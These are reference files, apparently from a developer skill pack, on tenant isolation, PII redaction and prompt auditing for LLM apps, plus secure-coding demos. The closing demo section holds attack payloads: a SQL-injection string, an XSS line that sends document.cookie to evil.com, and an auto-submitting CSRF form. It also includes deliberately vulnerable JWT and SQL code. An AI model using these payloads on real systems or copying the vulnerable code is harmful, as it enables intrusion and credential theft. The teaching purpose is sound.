source_refs: SourceReference
preparation_time_ms: float
async def prepare_for_llm(
query: str,
ctx: RequestContext,
) -> PreLLMResult:
"""
Complete pre-LLM preparation:
1. Retrieve with tenant isolation
2. Extract content only
3. Save references for attribution
"""
start = time.monotonic()
# Step 1: Tenant-scoped retrieval
raw_results, source_refs = await retrieve_with_isolation(
query=query,
ctx=ctx,
)
# Step 2: Extract and clean content
context_texts = [strip_identifiers(text) for text in raw_results]
# Step 3: Audit for any remaining IDs
for text in context_texts:
violations = audit_prompt(text)
if violations:
logger.warning(
"ID found in content, redacting",
violations=violations,
)
elapsed = (time.monotonic() - start) * 1000
return PreLLMResult(
query=query,
context_texts=context_texts,
source_refs=source_refs,
preparation_time_ms=elapsed,
)OrchestKit Integration
In Content Analysis Workflow
# backend/app/workflows/agents/retriever.py
async def retrieve_context(state: AnalysisState) -> AnalysisState:
"""RAG retrieval with tenant isolation"""
ctx = state.request_context
# Pre-LLM preparation
pre_llm = await prepare_for_llm(
query=state.analysis_request.query,
ctx=ctx,
)
# Store for later phases
return state.copy(
context_texts=pre_llm.context_texts,
source_refs=pre_llm.source_refs,
# NO IDs in state that goes to LLM
)In Library Search
# backend/app/services/search.py
async def search_libraries(
query: str,
ctx: RequestContext,
) -> SearchResult:
"""Search golden dataset with isolation"""
# Always filter by tenant
results = await db.execute(
"""
SELECT id, title, url, summary, content
FROM golden_dataset
WHERE tenant_id = :tenant_id
AND search_vector @@ plainto_tsquery(:query)
ORDER BY ts_rank(search_vector, plainto_tsquery(:query)) DESC
LIMIT 20
""",
{
"tenant_id": ctx.tenant_id,
"query": query,
}
)
# Return content and refs separately
return SearchResult(
items=[r.content for r in results], # Content for LLM
refs=[r.id for r in results], # IDs for attribution
)Common Mistakes
# ❌ BAD: Query without tenant filter
results = await db.execute("SELECT * FROM documents")
# ❌ BAD: Tenant filter as optional
async def search(tenant_id: UUID | None = None):
query = "SELECT * FROM documents"
if tenant_id: # Can be bypassed!
query += f" WHERE tenant_id = '{tenant_id}'"
# ❌ BAD: Trusting client-provided tenant
async def search(request: Request):
tenant_id = request.query_params["tenant_id"] # Attacker controls!
# ❌ BAD: Including IDs in content
results = [{"id": doc.id, "content": doc.content} for doc in docs]
# ✅ GOOD: Mandatory tenant filter from context
results = await db.execute(
"SELECT content FROM documents WHERE tenant_id = :tid",
{"tid": ctx.tenant_id} # From verified JWT
)
# ✅ GOOD: Content separate from refs
content = [doc.content for doc in docs] # For LLM
refs = [doc.id for doc in docs] # For attributionTesting Pre-LLM Filtering
class TestPreLLMFiltering:
async def test_retrieval_respects_tenant(
self,
tenant_a_ctx,
tenant_b_ctx,
):
# Create doc for tenant B
await create_document(
tenant_id=tenant_b_ctx.tenant_id,
content="Secret data",
)
# Search as tenant A
result = await prepare_for_llm(
query="secret",
ctx=tenant_a_ctx,
)
# Must not find tenant B's data
assert len(result.context_texts) == 0
async def test_content_has_no_uuids(self, ctx):
result = await prepare_for_llm(
query="test query",
ctx=ctx,
)
for text in result.context_texts:
assert not re.search(UUID_PATTERN, text)
async def test_source_refs_captured(self, ctx):
result = await prepare_for_llm(
query="test query",
ctx=ctx,
)
# Refs saved for attribution
assert len(result.source_refs.document_ids) > 0
assert result.source_refs.retrieval_timestamp is not NonePresidio Integration
Microsoft Presidio Integration
Enterprise-grade PII detection and anonymization with Microsoft Presidio.
Installation
pip install presidio-analyzer presidio-anonymizer
python -m spacy download en_core_web_lgBasic Usage
from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine
# Initialize engines (singleton recommended)
analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()
def detect_pii(text: str, language: str = "en") -> list:
"""Detect PII entities in text."""
return analyzer.analyze(
text=text,
language=language,
entities=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD", "US_SSN"]
)
def anonymize_text(text: str, language: str = "en") -> str:
"""Detect and anonymize PII in text."""
results = analyzer.analyze(text=text, language=language)
return anonymizer.anonymize(text=text, analyzer_results=results).textCustom Operators
from presidio_anonymizer.entities import OperatorConfig
operators = {
"PERSON": OperatorConfig("replace", {"new_value": "[PERSON]"}),
"CREDIT_CARD": OperatorConfig("mask", {"masking_char": "*", "chars_to_mask": 12}),
"EMAIL_ADDRESS": OperatorConfig("hash", {"hash_type": "sha256"}),
"US_SSN": OperatorConfig("redact"),
}
anonymized = anonymizer.anonymize(text=text, analyzer_results=results, operators=operators)Custom Recognizers
from presidio_analyzer import Pattern, PatternRecognizer
internal_id_recognizer = PatternRecognizer(
supported_entity="INTERNAL_ID",
patterns=[Pattern(name="internal_id", regex=r"ID-[A-Z]{2}-\d{6}", score=0.9)]
)
analyzer.registry.add_recognizer(internal_id_recognizer)References
Prompt Audit
Prompt Audit
Purpose
Before any prompt is sent to an LLM, audit it for forbidden content:
┌────────────────────────────────────────────────────────────┐
│ PROMPT AUDIT │
├────────────────────────────────────────────────────────────┤
│ │
│ Prompt Template + Variables ──► Audit ──► Send to LLM │
│ │ │
│ ▼ │
│ ┌──────────────┐ │
│ │ FORBIDDEN │ │
│ │ PATTERNS │ │
│ ├──────────────┤ │
│ │ • user_id │ │
│ │ • tenant_id │ │
│ │ • UUIDs │ │
│ │ • API keys │ │
│ │ • Tokens │ │
│ │ • Secrets │ │
│ └──────────────┘ │
│ │ │
│ ┌───────────────┼───────────────┐ │
│ ▼ ▼ ▼ │
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
│ │ CLEAN │ │ WARNING │ │ BLOCK │ │
│ │ │ │ │ │ │ │
│ │ Proceed │ │ Log + │ │ Reject │ │
│ │ │ │ Proceed │ │ │ │
│ └──────────┘ └──────────┘ └──────────┘ │
│ │
└────────────────────────────────────────────────────────────┘OrchestKit Forbidden Patterns
Critical (Block Immediately)
| Pattern | Regex | Why Block |
|---|---|---|
| UUID | [0-9a-f]\{8\}-[0-9a-f]\{4\}-... | Hallucination, cross-tenant |
| API Key | api[_-]?key | Secret exposure |
| Token | token\s*[:=] | Auth exposure |
| Password | password\s*[:=] | Credential exposure |
| Secret | secret\s*[:=] | Generic secret |
Warning (Log and Review)
| Pattern | Regex | Why Warn |
|---|---|---|
| user_id | user[_-]?id | Likely context leak |
| tenant_id | tenant[_-]?id | Likely isolation leak |
| analysis_id | analysis[_-]?id | Likely tracking leak |
| document_id | document[_-]?id | Likely reference leak |
| session_id | session[_-]?id | Likely auth leak |
Implementation
1. Pattern Definitions
import re
from enum import Enum
from dataclasses import dataclass
class AuditSeverity(Enum):
CLEAN = "clean"
WARNING = "warning"
CRITICAL = "critical"
@dataclass
class AuditViolation:
pattern: str
severity: AuditSeverity
match: str
position: int
# OrchestKit-specific patterns
CRITICAL_PATTERNS = [
# UUIDs
(r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}', "UUID"),
# Secrets
(r'api[_-]?key\s*[:=]\s*["\']?\S+', "API_KEY"),
(r'password\s*[:=]\s*["\']?\S+', "PASSWORD"),
(r'secret\s*[:=]\s*["\']?\S+', "SECRET"),
(r'token\s*[:=]\s*["\']?\S+', "TOKEN"),
(r'bearer\s+\S+', "BEARER_TOKEN"),
]
WARNING_PATTERNS = [
# OrchestKit identifiers
(r'\buser[_-]?id\b', "USER_ID_FIELD"),
(r'\btenant[_-]?id\b', "TENANT_ID_FIELD"),
(r'\banalysis[_-]?id\b', "ANALYSIS_ID_FIELD"),
(r'\bdocument[_-]?id\b', "DOCUMENT_ID_FIELD"),
(r'\bartifact[_-]?id\b', "ARTIFACT_ID_FIELD"),
(r'\bchunk[_-]?id\b', "CHUNK_ID_FIELD"),
(r'\bsession[_-]?id\b', "SESSION_ID_FIELD"),
(r'\btrace[_-]?id\b', "TRACE_ID_FIELD"),
(r'\bworkflow[_-]?run[_-]?id\b', "WORKFLOW_ID_FIELD"),
]2. Audit Function
def audit_prompt(prompt: str) -> list[AuditViolation]:
"""
Audit prompt for forbidden patterns.
Returns list of violations.
"""
violations = []
# Check critical patterns
for pattern, name in CRITICAL_PATTERNS:
for match in re.finditer(pattern, prompt, re.IGNORECASE):
violations.append(AuditViolation(
pattern=name,
severity=AuditSeverity.CRITICAL,
match=match.group()[:50], # Truncate for logging
position=match.start(),
))
# Check warning patterns
for pattern, name in WARNING_PATTERNS:
for match in re.finditer(pattern, prompt, re.IGNORECASE):
violations.append(AuditViolation(
pattern=name,
severity=AuditSeverity.WARNING,
match=match.group(),
position=match.start(),
))
return violations
def has_critical_violations(violations: list[AuditViolation]) -> bool:
"""Check if any violations are critical"""
return any(v.severity == AuditSeverity.CRITICAL for v in violations)3. Audit Decorator
from functools import wraps
import structlog
logger = structlog.get_logger()
def audit_before_llm(func):
"""
Decorator that audits prompts before LLM call.
Blocks on critical violations, logs warnings.
"""
@wraps(func)
async def wrapper(*args, **kwargs):
# Extract prompt from args/kwargs
prompt = kwargs.get("prompt") or args[0]
# Audit
violations = audit_prompt(prompt)
# Log warnings
for v in violations:
if v.severity == AuditSeverity.WARNING:
logger.warning(
"prompt_audit_warning",
pattern=v.pattern,
position=v.position,
)
# Block on critical
if has_critical_violations(violations):
critical = [v for v in violations
if v.severity == AuditSeverity.CRITICAL]
raise PromptSecurityError(
f"Prompt contains forbidden content: {[v.pattern for v in critical]}"
)
# Proceed
return await func(*args, **kwargs)
return wrapper
# Usage
@audit_before_llm
async def call_llm(prompt: str) -> str:
return await llm.generate(prompt)4. Safe Prompt Builder
class SafePromptBuilder:
"""
Builds prompts with built-in audit.
Prevents accidental ID inclusion.
"""
def __init__(self):
self._parts: list[str] = []
self._context_ids: dict[str, Any] = {} # Stored but never in prompt
def add_instruction(self, text: str) -> "SafePromptBuilder":
"""Add instruction text (audited)"""
violations = audit_prompt(text)
if has_critical_violations(violations):
raise PromptSecurityError("Instruction contains forbidden content")
self._parts.append(text)
return self
def add_content(self, content: str) -> "SafePromptBuilder":
"""Add user content (sanitized)"""
# Strip any IDs from content
clean_content = self._sanitize(content)
self._parts.append(clean_content)
return self
def add_context_texts(self, texts: list[str]) -> "SafePromptBuilder":
"""Add context texts (sanitized)"""
for text in texts:
clean = self._sanitize(text)
self._parts.append(f"- {clean}")
return self
def store_context_id(self, key: str, value: Any) -> "SafePromptBuilder":
"""Store ID for post-LLM attribution (never in prompt)"""
self._context_ids[key] = value
return self
def _sanitize(self, text: str) -> str:
"""Remove any IDs from text"""
# Remove UUIDs
text = re.sub(
r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
'[ID]',
text,
flags=re.IGNORECASE
)
return text
def build(self) -> tuple[str, dict]:
"""
Build prompt and return with stored context.
Returns: (prompt, context_ids)
"""
prompt = "\n\n".join(self._parts)
# Final audit
violations = audit_prompt(prompt)
if violations:
logger.warning(
"prompt_audit_final",
violation_count=len(violations),
)
if has_critical_violations(violations):
raise PromptSecurityError("Built prompt contains forbidden content")
return prompt, self._context_ids
# Usage
builder = SafePromptBuilder()
prompt, context = (
builder
.add_instruction("Analyze the following content:")
.add_content(user_query)
.add_context_texts(retrieved_docs)
.store_context_id("user_id", ctx.user_id) # Stored, not in prompt
.store_context_id("sources", source_refs) # Stored, not in prompt
.build()
)OrchestKit Integration
Workflow Integration
# backend/app/workflows/agents/prompts/content_analysis.py
from llm_safety import SafePromptBuilder
def build_analysis_prompt(
query: str,
context_texts: list[str],
ctx: RequestContext,
) -> tuple[str, dict]:
"""
Build content analysis prompt safely.
Context IDs stored separately for attribution.
"""
return (
SafePromptBuilder()
.add_instruction("""
You are an expert content analyzer. Analyze the following
content and provide insights about:
1. Key concepts
2. Difficulty level
3. Prerequisites
4. Summary
""")
.add_instruction(f"User query: {query}")
.add_instruction("Relevant context:")
.add_context_texts(context_texts)
.store_context_id("user_id", ctx.user_id)
.store_context_id("tenant_id", ctx.tenant_id)
.store_context_id("trace_id", ctx.trace_id)
.build()
)CI/CD Integration
#!/bin/bash
# scripts/audit_prompts.sh
echo "Auditing prompt templates..."
# Check for IDs in prompt files
grep -rn \
"user_id\|tenant_id\|analysis_id\|document_id\|[0-9a-f]\{8\}-[0-9a-f]\{4\}" \
backend/app/**/prompts/ \
--include="*.py" \
--include="*.txt" \
--include="*.jinja2"
if [ $? -eq 0 ]; then
echo "❌ Found potential ID leaks in prompts!"
exit 1
fi
echo "✅ Prompt audit passed"Testing
class TestPromptAudit:
def test_detects_uuid(self):
prompt = "Analyze doc 123e4567-e89b-12d3-a456-426614174000"
violations = audit_prompt(prompt)
assert len(violations) == 1
assert violations[0].severity == AuditSeverity.CRITICAL
assert violations[0].pattern == "UUID"
def test_detects_api_key(self):
prompt = "Use api_key: sk-1234567890abcdef"
violations = audit_prompt(prompt)
assert any(v.pattern == "API_KEY" for v in violations)
def test_warns_on_user_id_field(self):
prompt = "For user_id please provide analysis"
violations = audit_prompt(prompt)
assert len(violations) == 1
assert violations[0].severity == AuditSeverity.WARNING
def test_safe_builder_blocks_id(self):
with pytest.raises(PromptSecurityError):
(
SafePromptBuilder()
.add_instruction("Analyze for user 123e4567-e89b-12d3-a456-426614174000")
.build()
)
def test_safe_builder_sanitizes_content(self):
prompt, _ = (
SafePromptBuilder()
.add_content("Doc ID: 123e4567-e89b-12d3-a456-426614174000")
.build()
)
assert "123e4567" not in prompt
assert "[ID]" in prompt
def test_context_ids_not_in_prompt(self):
from uuid import uuid4
user_id = uuid4()
prompt, context = (
SafePromptBuilder()
.add_instruction("Analyze this")
.store_context_id("user_id", user_id)
.build()
)
assert str(user_id) not in prompt
assert context["user_id"] == user_idRequest Context Pattern
Request Context Pattern
Purpose
The RequestContext is an immutable object created at the gateway that carries identity and tracing information through the entire request lifecycle. It flows AROUND the LLM (never in prompts) and is used for:
- Authorization - Who is making the request
- Data Filtering - Scope queries to tenant/user
- Attribution - Tag results with proper ownership
- Observability - Correlate logs and traces
Implementation
from dataclasses import dataclass
from datetime import datetime, timezone
from uuid import UUID
from typing import FrozenSet
@dataclass(frozen=True) # Immutable!
class RequestContext:
"""
System context that NEVER appears in LLM prompts.
Created at gateway, flows through all layers.
"""
# === Identity (WHO) ===
user_id: UUID
tenant_id: UUID # For B2B multi-tenant
session_id: str
permissions: FrozenSet[str]
# === Tracing (OBSERVABILITY) ===
request_id: str # Unique per request
trace_id: str # Distributed tracing
span_id: str # Current span
# === Resource (WHAT) ===
resource_id: UUID | None = None # analysis_id, document_id, etc.
resource_type: str | None = None
# === Metadata (WHEN, WHERE) ===
timestamp: datetime = None
client_ip: str = ""
user_agent: str = ""
def __post_init__(self):
if self.timestamp is None:
object.__setattr__(self, 'timestamp', datetime.now(timezone.utc))Creation at Gateway
from fastapi import Request, Depends
from jose import jwt
async def get_request_context(request: Request) -> RequestContext:
"""FastAPI dependency that creates RequestContext from JWT"""
# 1. Extract and verify JWT
auth_header = request.headers.get("Authorization", "")
if not auth_header.startswith("Bearer "):
raise HTTPException(401, "Missing authorization")
token = auth_header[7:]
try:
claims = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
except jwt.JWTError:
raise HTTPException(401, "Invalid token")
# 2. Build immutable context
return RequestContext(
user_id=UUID(claims["sub"]),
tenant_id=UUID(claims["tenant_id"]),
session_id=claims["session_id"],
permissions=frozenset(claims.get("permissions", [])),
request_id=request.headers.get("X-Request-ID", str(uuid4())),
trace_id=generate_trace_id(),
span_id=generate_span_id(),
client_ip=request.client.host,
user_agent=request.headers.get("User-Agent", ""),
)Usage in Endpoints
@router.post("/api/v1/analyze")
async def create_analysis(
request: AnalyzeRequest,
ctx: RequestContext = Depends(get_request_context),
):
# Context is available throughout the request
# Pass it to services, repositories, etc.
# Authorization uses context
await authorize(ctx, "analysis:create", None)
# Data access uses context for filtering
documents = await repo.find_by_user(ctx)
# LLM call does NOT receive context
# (see llm-safety-patterns skill)
# Attribution uses context
result = await save_result(llm_output, ctx)
return resultOrchestKit Parameters
In OrchestKit, these identifiers should be in RequestContext:
| Parameter | Type | Source | Purpose |
|---|---|---|---|
user_id | UUID | JWT | Data ownership |
tenant_id | UUID | JWT | Multi-tenant isolation |
session_id | str | JWT | Session tracking |
analysis_id | UUID | Generated | Current analysis job |
trace_id | str | Generated | Langfuse tracing |
request_id | str | Header/Generated | Request correlation |
Why Immutable?
The context is frozen (frozen=True) to prevent:
- Accidental modification - Can't change user_id mid-request
- Security bypass - Can't escalate permissions
- Thread safety - Safe to pass between async tasks
- Hashability - Can be used as dict key for caching
Anti-Patterns
# BAD: Mutable context
class RequestContext:
user_id: UUID # Can be changed!
# BAD: Context in prompt
prompt = f"User {ctx.user_id} wants to analyze..."
# BAD: Context not passed to services
result = await service.process(content) # Missing ctx!
# BAD: Context created inside service
def process(self):
ctx = RequestContext(...) # Should come from gateway!Tenant Isolation
Tenant Isolation Patterns
The Golden Rule
Every database query MUST include a tenant filter. There is no "global" query.
Why This Matters
Without tenant isolation:
- User A could see User B's documents
- LLM could mix data from different tenants
- A bug could expose all customers' data
- Compliance violations (GDPR, HIPAA, SOC2)
Implementation Pattern: Tenant-Scoped Repository
from uuid import UUID
from typing import TypeVar, Generic
from sqlalchemy import select
from sqlalchemy.ext.asyncio import AsyncSession
T = TypeVar("T")
class TenantScopedRepository(Generic[T]):
"""
Base repository that ALWAYS filters by tenant.
Cannot be bypassed - tenant filter is mandatory.
"""
def __init__(self, session: AsyncSession, ctx: RequestContext, model: type[T]):
self.session = session
self.ctx = ctx
self.model = model
def _base_query(self):
"""Every query starts with tenant filter"""
return select(self.model).where(
self.model.tenant_id == self.ctx.tenant_id
)
async def find_all(self, **filters) -> list[T]:
"""Find all matching records (tenant-scoped)"""
query = self._base_query()
for key, value in filters.items():
query = query.where(getattr(self.model, key) == value)
result = await self.session.execute(query)
return result.scalars().all()
async def find_by_id(self, id: UUID) -> T | None:
"""
Find by ID (tenant-scoped).
Even by-ID lookup includes tenant check!
"""
query = self._base_query().where(self.model.id == id)
result = await self.session.execute(query)
return result.scalar_one_or_none()
async def find_by_user(self) -> list[T]:
"""Find records owned by current user (tenant + user scoped)"""
query = self._base_query().where(
self.model.user_id == self.ctx.user_id
)
result = await self.session.execute(query)
return result.scalars().all()Vector Search with Tenant Isolation
async def semantic_search(
query_embedding: list[float],
ctx: RequestContext,
limit: int = 10,
) -> list[Document]:
"""
Semantic search with mandatory tenant isolation.
"""
return await db.execute(
"""
SELECT id, content, metadata,
1 - (embedding <-> :query) as similarity
FROM documents
WHERE tenant_id = :tenant_id -- ALWAYS filtered!
AND user_id = :user_id -- User's docs only
AND embedding <-> :query < 0.5 -- Similarity threshold
ORDER BY embedding <-> :query
LIMIT :limit
""",
{
"tenant_id": ctx.tenant_id, # From context
"user_id": ctx.user_id, # From context
"query": query_embedding,
"limit": limit,
}
)Full-Text Search with Tenant Isolation
async def fulltext_search(
query: str,
ctx: RequestContext,
limit: int = 20,
) -> list[Analysis]:
"""
Full-text search with mandatory tenant isolation.
"""
return await db.execute(
"""
SELECT id, title, url,
ts_rank(search_vector, plainto_tsquery(:query)) as rank
FROM analyses
WHERE tenant_id = :tenant_id -- ALWAYS filtered!
AND user_id = :user_id -- User's analyses only
AND status = 'complete'
AND search_vector @@ plainto_tsquery(:query)
ORDER BY rank DESC
LIMIT :limit
""",
{
"tenant_id": ctx.tenant_id,
"user_id": ctx.user_id,
"query": query,
"limit": limit,
}
)Caching with Tenant Isolation
def cache_key(ctx: RequestContext, operation: str, *args) -> str:
"""
Cache keys MUST include tenant_id to prevent cross-tenant leakage.
"""
return f"{ctx.tenant_id}:{ctx.user_id}:{operation}:{':'.join(str(a) for a in args)}"
# Usage
key = cache_key(ctx, "analysis", analysis_id)
# Result: "tenant_abc:user_123:analysis:analysis_456"Testing Tenant Isolation
import pytest
from uuid import uuid4
class TestTenantIsolation:
"""Every repository MUST have these tests"""
@pytest.fixture
def tenant_a_ctx(self):
return RequestContext(
user_id=uuid4(),
tenant_id=uuid4(), # Tenant A
...
)
@pytest.fixture
def tenant_b_ctx(self):
return RequestContext(
user_id=uuid4(),
tenant_id=uuid4(), # Tenant B (different!)
...
)
async def test_tenant_a_cannot_see_tenant_b_documents(
self,
tenant_a_ctx,
tenant_b_ctx,
db_session,
):
# Create document for Tenant B
doc = Document(
id=uuid4(),
tenant_id=tenant_b_ctx.tenant_id,
content="Secret data",
)
await db_session.add(doc)
await db_session.commit()
# Tenant A tries to access
repo = TenantScopedRepository(db_session, tenant_a_ctx, Document)
result = await repo.find_by_id(doc.id)
# MUST be None - tenant A cannot see tenant B's data
assert result is None
async def test_tenant_a_cannot_search_tenant_b_documents(
self,
tenant_a_ctx,
tenant_b_ctx,
):
# Create and embed document for Tenant B
await create_document(
tenant_id=tenant_b_ctx.tenant_id,
content="Machine learning tutorial",
)
# Tenant A searches for "machine learning"
results = await semantic_search(
query_embedding=embed("machine learning"),
ctx=tenant_a_ctx,
)
# MUST be empty - tenant A cannot find tenant B's data
assert len(results) == 0Common Mistakes
# BAD: Global query without tenant filter
async def find_all():
return await db.execute("SELECT * FROM documents")
# BAD: Tenant filter as optional parameter
async def find(tenant_id: UUID | None = None):
query = "SELECT * FROM documents"
if tenant_id: # Can be bypassed!
query += f" WHERE tenant_id = '{tenant_id}'"
# BAD: Trusting client-provided tenant_id
async def find(request: Request):
tenant_id = request.query_params["tenant_id"] # User controls this!
return await db.find(tenant_id=tenant_id)
# GOOD: Tenant from authenticated context only
async def find(ctx: RequestContext):
return await db.find(tenant_id=ctx.tenant_id) # From JWTRow-Level Security (PostgreSQL)
For additional protection, use PostgreSQL RLS:
-- Enable RLS on table
ALTER TABLE documents ENABLE ROW LEVEL SECURITY;
-- Create policy
CREATE POLICY tenant_isolation ON documents
USING (tenant_id = current_setting('app.tenant_id')::uuid);
-- Set tenant before queries
SET app.tenant_id = 'tenant-uuid-here';This provides database-level enforcement even if application code has bugs.
Vulnerability Demos
Vulnerability Demonstrations
Interactive examples showing how common vulnerabilities work and how to fix them.
SQL Injection
Vulnerable Code
# DO NOT USE - Example only
from fastapi import FastAPI, Query
import sqlite3
app = FastAPI()
@app.get("/users/search")
def search_users(username: str = Query(...)):
conn = sqlite3.connect("app.db")
cursor = conn.cursor()
# VULNERABLE: User input directly in query
query = f"SELECT * FROM users WHERE username = '{username}'"
cursor.execute(query)
return cursor.fetchall()
# Attack payload: username = "' OR '1'='1' --"
# Resulting query: SELECT * FROM users WHERE username = '' OR '1'='1' --'
# This returns ALL users in the databaseSecure Code
# Safe implementation using parameterized queries
from fastapi import FastAPI, Query
import sqlite3
app = FastAPI()
@app.get("/users/search")
def search_users(username: str = Query(..., min_length=1, max_length=50)):
conn = sqlite3.connect("app.db")
cursor = conn.cursor()
# SAFE: Parameterized query - input is escaped by the driver
cursor.execute("SELECT * FROM users WHERE username = ?", (username,))
return cursor.fetchall()
# With SQLAlchemy ORM (preferred)
from sqlalchemy.orm import Session
from models import User
def search_users_orm(db: Session, username: str):
# SAFE: ORM handles parameterization
return db.query(User).filter(User.username == username).first()Detection
- Pattern to find:
f"SELECT,f"INSERT,f"UPDATE,f"DELETE,+ "SELECT - Bandit rule: B608 (hardcoded_sql_expressions)
- Semgrep rule:
python.lang.security.audit.formatted-sql-query
# Detect with Bandit
bandit -r . -t B608
# Detect with Semgrep
semgrep --config "p/sql-injection" .
# Grep for f-string SQL
grep -rn "f\"SELECT\|f\"INSERT\|f\"UPDATE\|f\"DELETE" --include="*.py" .Cross-Site Scripting (XSS)
Vulnerable Code
// DO NOT USE - Example only
// Reflected XSS - Dangerous innerHTML
function displayMessage() {
const urlParams = new URLSearchParams(window.location.search);
const message = urlParams.get('message');
// VULNERABLE: User input directly inserted as HTML
document.getElementById('output').innerHTML = message;
}
// Attack payload: ?message=<script>document.location='https://evil.com/steal?c='+document.cookie</script>
// This executes JavaScript that steals cookies# DO NOT USE - Server-side XSS (Flask)
from flask import Flask, request
app = Flask(__name__)
@app.route('/greet')
def greet():
name = request.args.get('name', '')
# VULNERABLE: User input in HTML response
return f"<h1>Hello, {name}!</h1>"
# Attack: /greet?name=<script>alert('XSS')</script>Secure Code
// Safe implementation using textContent
function displayMessage() {
const urlParams = new URLSearchParams(window.location.search);
const message = urlParams.get('message');
// SAFE: textContent escapes HTML entities
document.getElementById('output').textContent = message;
}
// If HTML is required, use DOMPurify
import DOMPurify from 'dompurify';
function displayRichMessage() {
const urlParams = new URLSearchParams(window.location.search);
const message = urlParams.get('message');
// SAFE: DOMPurify removes malicious content
document.getElementById('output').innerHTML = DOMPurify.sanitize(message);
}# Safe implementation using template escaping
from flask import Flask, request, render_template_string
from markupsafe import escape
app = Flask(__name__)
@app.route('/greet')
def greet():
name = request.args.get('name', '')
# SAFE: escape() converts <script> to <script>
return f"<h1>Hello, {escape(name)}!</h1>"
# Or use Jinja2 templates (auto-escape by default)
@app.route('/greet-template')
def greet_template():
return render_template_string(
"<h1>Hello, {{ name }}!</h1>", # Auto-escaped
name=request.args.get('name', '')
)Detection
- Pattern to find:
.innerHTML =,dangerouslySetInnerHTML,v-html= - ESLint rule:
no-unsanitized/property - Semgrep rule:
javascript.browser.security.insecure-document-method
# Detect with Semgrep
semgrep --config "p/xss" .
# Grep for innerHTML
grep -rn "\.innerHTML\s*=" --include="*.js" --include="*.jsx" --include="*.ts" --include="*.tsx" .
# React dangerouslySetInnerHTML
grep -rn "dangerouslySetInnerHTML" --include="*.jsx" --include="*.tsx" .Cross-Site Request Forgery (CSRF)
Vulnerable Code
# DO NOT USE - Example only
from fastapi import FastAPI, Form
app = FastAPI()
@app.post("/transfer")
async def transfer_money(
to_account: str = Form(...),
amount: float = Form(...)
):
# VULNERABLE: No CSRF protection
# Attacker can create a form on evil.com that submits to this endpoint
# When victim visits evil.com while logged in, their session cookie is sent
perform_transfer(to_account, amount)
return {"status": "success"}<!-- Attacker's page on evil.com -->
<!-- DO NOT USE - Attack example only -->
<html>
<body onload="document.forms[0].submit()">
<form action="https://bank.com/transfer" method="POST">
<input type="hidden" name="to_account" value="ATTACKER123" />
<input type="hidden" name="amount" value="10000" />
</form>
</body>
</html>Secure Code
# Safe implementation with CSRF tokens
from fastapi import FastAPI, Form, Depends, HTTPException, Request
from fastapi.responses import HTMLResponse
import secrets
from starlette.middleware.sessions import SessionMiddleware
app = FastAPI()
app.add_middleware(SessionMiddleware, secret_key="your-secret-key")
def get_csrf_token(request: Request) -> str:
if "csrf_token" not in request.session:
request.session["csrf_token"] = secrets.token_urlsafe(32)
return request.session["csrf_token"]
def verify_csrf_token(request: Request, csrf_token: str = Form(...)):
if request.session.get("csrf_token") != csrf_token:
raise HTTPException(status_code=403, detail="CSRF token mismatch")
@app.get("/transfer-form")
async def transfer_form(request: Request):
token = get_csrf_token(request)
return HTMLResponse(f"""
<form method="POST" action="/transfer">
<input type="hidden" name="csrf_token" value="{token}" />
<input name="to_account" placeholder="Account" />
<input name="amount" type="number" placeholder="Amount" />
<button type="submit">Transfer</button>
</form>
""")
@app.post("/transfer")
async def transfer_money(
request: Request,
to_account: str = Form(...),
amount: float = Form(...),
_: None = Depends(verify_csrf_token) # CSRF check
):
# SAFE: Request will fail without valid CSRF token
perform_transfer(to_account, amount)
return {"status": "success"}# Alternative: SameSite cookies (modern approach)
from fastapi import FastAPI, Response
@app.post("/login")
async def login(response: Response, username: str, password: str):
# Authenticate user...
# SAFE: SameSite=Strict prevents cross-origin cookie sending
response.set_cookie(
key="session_id",
value=session_token,
httponly=True,
secure=True,
samesite="strict" # Key protection
)
return {"status": "logged_in"}Detection
- Check for: Missing CSRF tokens in forms, cookies without SameSite
- Semgrep rule:
python.django.security.audit.csrf-exempt
# Check cookie settings
grep -rn "set_cookie\|setCookie" --include="*.py" --include="*.js" . | grep -v "samesite"
# Django CSRF exempt decorators
grep -rn "@csrf_exempt" --include="*.py" .
# Check forms without CSRF tokens
grep -rn "<form" --include="*.html" . | grep -v "csrf"Authentication Bypass
Vulnerable Code
# DO NOT USE - Example only
from fastapi import FastAPI, Header
import jwt
app = FastAPI()
SECRET_KEY = "mysecret"
@app.get("/admin")
async def admin_panel(authorization: str = Header(...)):
token = authorization.replace("Bearer ", "")
# VULNERABLE: Algorithm read from token header (algorithm confusion attack)
header = jwt.get_unverified_header(token)
payload = jwt.decode(token, SECRET_KEY, algorithms=[header['alg']])
# Attacker can set alg="none" or use public key as HMAC secret
if payload.get("role") == "admin":
return {"admin_data": "sensitive"}
return {"error": "Not admin"}# DO NOT USE - Password comparison vulnerable to timing attack
import hmac
def check_password(stored_hash: str, provided_hash: str) -> bool:
# VULNERABLE: Early exit reveals password length
if len(stored_hash) != len(provided_hash):
return False
# VULNERABLE: Character-by-character comparison
for a, b in zip(stored_hash, provided_hash):
if a != b:
return False
return TrueSecure Code
# Safe implementation with hardcoded algorithm
from fastapi import FastAPI, Header, HTTPException, Depends
import jwt
from datetime import datetime, timedelta
app = FastAPI()
SECRET_KEY = "your-256-bit-secret"
ALGORITHM = "HS256"
def verify_token(authorization: str = Header(...)):
try:
token = authorization.replace("Bearer ", "")
# SAFE: Algorithm is hardcoded, not read from token
payload = jwt.decode(
token,
SECRET_KEY,
algorithms=[ALGORITHM], # Fixed algorithm
options={
"require": ["exp", "iat", "sub"], # Required claims
}
)
return payload
except jwt.ExpiredSignatureError:
raise HTTPException(401, "Token expired")
except jwt.InvalidTokenError:
raise HTTPException(401, "Invalid token")
@app.get("/admin")
async def admin_panel(payload: dict = Depends(verify_token)):
if payload.get("role") != "admin":
raise HTTPException(403, "Admin access required")
return {"admin_data": "sensitive"}# Safe password comparison using constant-time comparison
import hmac
import hashlib
def check_password_secure(stored_hash: str, provided_password: str) -> bool:
# Hash the provided password
provided_hash = hashlib.sha256(provided_password.encode()).hexdigest()
